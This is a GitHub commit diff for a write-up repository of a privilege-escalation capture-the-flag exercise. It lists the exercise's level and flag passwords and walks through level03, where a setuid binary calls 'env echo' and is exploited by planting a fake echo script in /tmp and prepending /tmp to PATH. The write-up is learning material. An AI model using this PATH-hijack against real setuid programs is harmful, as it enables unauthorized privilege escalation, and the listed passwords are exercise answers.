Skip to content

Commit

Permalink
Merge branch 'main' of https://github.com/nuoxoxo/cfo into main
Browse files Browse the repository at this point in the history
  • Loading branch information
@nuoxoxo
nuoxoxo committed Nov 17, 2024
2 parents 5c5b3f0 + a6a871b commit 4684d29
Show file tree
Hide file tree
Showing 3 changed files with 80 additions and 34 deletions.
57 changes: 40 additions & 17 deletions README.mdx
View file
Original file line number Diff line number Diff line change
@@ -1,12 +1,13 @@
```b
flag00 nottoohardhere
level01 x24ti5gi3x0ol2eh4esiuxias
flag01 abcdefg
level02 f2av5il02puano7naaf6adaaf
flag02 ft_waNDReL0L
level03 kooda2puivaav1idi4f57q8iq
level04 qi0maab88jeaj46qoumi7maus
level05 ne2searoevaevoem4ov4ar8ap
flag00 nottoohardhere
flag01 abcdefg
flag02 ft_waNDReL0L
```


Expand Down Expand Up @@ -187,13 +188,37 @@ Password: ft_waNDReL0L
- Inspect
- ❌ `file` `readelf` `strings`
- βœ… `ltrace`
```b
```
> ls -l
-rwsr-sr-x 1 flag03 level03 8627 level03
^ ^ setuid bit & setgid bit are set
πŸ‘‰ when the binary is exec functions called inside it
are called under same level of permission
^^^ owner flag03 can rwx also setuid bit is set
^^^ group level03 can rx plus setgid bit (s) is set
^^^ others can rx
πŸ‘‰ when ./level03 is run
the entire process runs with owner flag03's priviledges
ie. I, user level00, can exploit priviledges limited to flag03
πŸ‘‰ conclusion: execute the ./level03 and doing so we gain
temporary elevated permissions as flag03
```

- We may also try `id` & `namei`

```b
> id
uid=2003(level03) gid=2003(level03) groups=2003(level03),100(users)
> namei -l ./level03
dr-x------ level03 level03 .
-rwsr-sr-x flag03 level03 level03
> namei -l /bin/getflag
-rwxr-xr-x root root getflag
```

- `ltrace` traces library function calls when the binary is executed

```b
> ltrace ./level03
πŸ‘‰ we can see the `s` bit in action
Expand All @@ -206,21 +231,19 @@ setresuid(2003, 2003, 2003, 0xb7e5ee55, 0xb7fed280) = 0
system("/usr/bin/env echo Exploit me" ...
### observations
πŸ‘‰ getegid & geteuid return a effective group/user ID ie. 2003
πŸ‘‰ setresgid & setresuid set Real/Effective/Saved ID to ensure
that the process maintains privileges
πŸ‘‰ `/usr/bin/env echo` uses a vulnerable relative path
since ./level03 has high privileges,
we can fake a false echo to run getflag inside ./level03
```
```b
> whereis getflag
getflag: /bin/getflag
πŸ‘‰ getegid & geteuid return a effective group/user ID 2003
which is my `id` as `level03`.
πŸ‘‰ Because privileges are elevated during the process
we have temporary permissions as `flag03`.
πŸ‘‰ This way we can exploit the `/usr/bin/env echo`
relative path vulnerability.
```

- Solution

```b
> whereis getflag
getflag: /bin/getflag
> echo -e "#\!/bin/bash\n/bin/getflag" > /tmp/echo
> chmod +x /tmp/echo
> export PATH=/tmp:$PATH πŸ‘ˆ prepend tmp to get it checked first
Expand Down
50 changes: 36 additions & 14 deletions level03/README.mdx
View file
Original file line number Diff line number Diff line change
Expand Up @@ -3,13 +3,37 @@
- Inspect
- ❌ `file` `readelf` `strings`
- βœ… `ltrace`
```b
```
> ls -l
-rwsr-sr-x 1 flag03 level03 8627 level03
^ ^ setuid bit & setgid bit are set
πŸ‘‰ when the binary is exec functions called inside it
are called under same level of permission
^^^ owner flag03 can rwx also setuid bit is set
^^^ group level03 can rx plus setgid bit (s) is set
^^^ others can rx
πŸ‘‰ when ./level03 is run
the entire process runs with owner flag03's priviledges
ie. I, user level00, can exploit priviledges limited to flag03
πŸ‘‰ conclusion: execute the ./level03 and doing so we gain
temporary elevated permissions as flag03
```

- We may also try `id` & `namei`

```b
> id
uid=2003(level03) gid=2003(level03) groups=2003(level03),100(users)
> namei -l ./level03
dr-x------ level03 level03 .
-rwsr-sr-x flag03 level03 level03
> namei -l /bin/getflag
-rwxr-xr-x root root getflag
```

- `ltrace` traces library function calls when the binary is executed

```b
> ltrace ./level03
πŸ‘‰ we can see the `s` bit in action
Expand All @@ -22,21 +46,19 @@ setresuid(2003, 2003, 2003, 0xb7e5ee55, 0xb7fed280) = 0
system("/usr/bin/env echo Exploit me" ...
### observations
πŸ‘‰ getegid & geteuid return a effective group/user ID ie. 2003
πŸ‘‰ setresgid & setresuid set Real/Effective/Saved ID to ensure
that the process maintains privileges
πŸ‘‰ `/usr/bin/env echo` uses a vulnerable relative path
since ./level03 has high privileges,
we can fake a false echo to run getflag inside ./level03
```
```b
> whereis getflag
getflag: /bin/getflag
πŸ‘‰ getegid & geteuid return a effective group/user ID 2003
which is my `id` as `level03`.
πŸ‘‰ Because privileges are elevated during the process
we have temporary permissions as `flag03`.
πŸ‘‰ This way we can exploit the `/usr/bin/env echo`
relative path vulnerability.
```

- Solution

```b
> whereis getflag
getflag: /bin/getflag
> echo -e "#\!/bin/bash\n/bin/getflag" > /tmp/echo
> chmod +x /tmp/echo
> export PATH=/tmp:$PATH πŸ‘ˆ prepend tmp to get it checked first
Expand Down
7 changes: 4 additions & 3 deletions tokens.mdx
View file
Original file line number Diff line number Diff line change
@@ -1,10 +1,11 @@
```b
flag00 nottoohardhere
level01 x24ti5gi3x0ol2eh4esiuxias
flag01 abcdefg
level02 f2av5il02puano7naaf6adaaf
flag02 ft_waNDReL0L
level03 kooda2puivaav1idi4f57q8iq
level04 qi0maab88jeaj46qoumi7maus
level05 ne2searoevaevoem4ov4ar8ap
flag00 nottoohardhere
flag01 abcdefg
flag02 ft_waNDReL0L
```

0 comments on commit 4684d29

Please sign in to comment.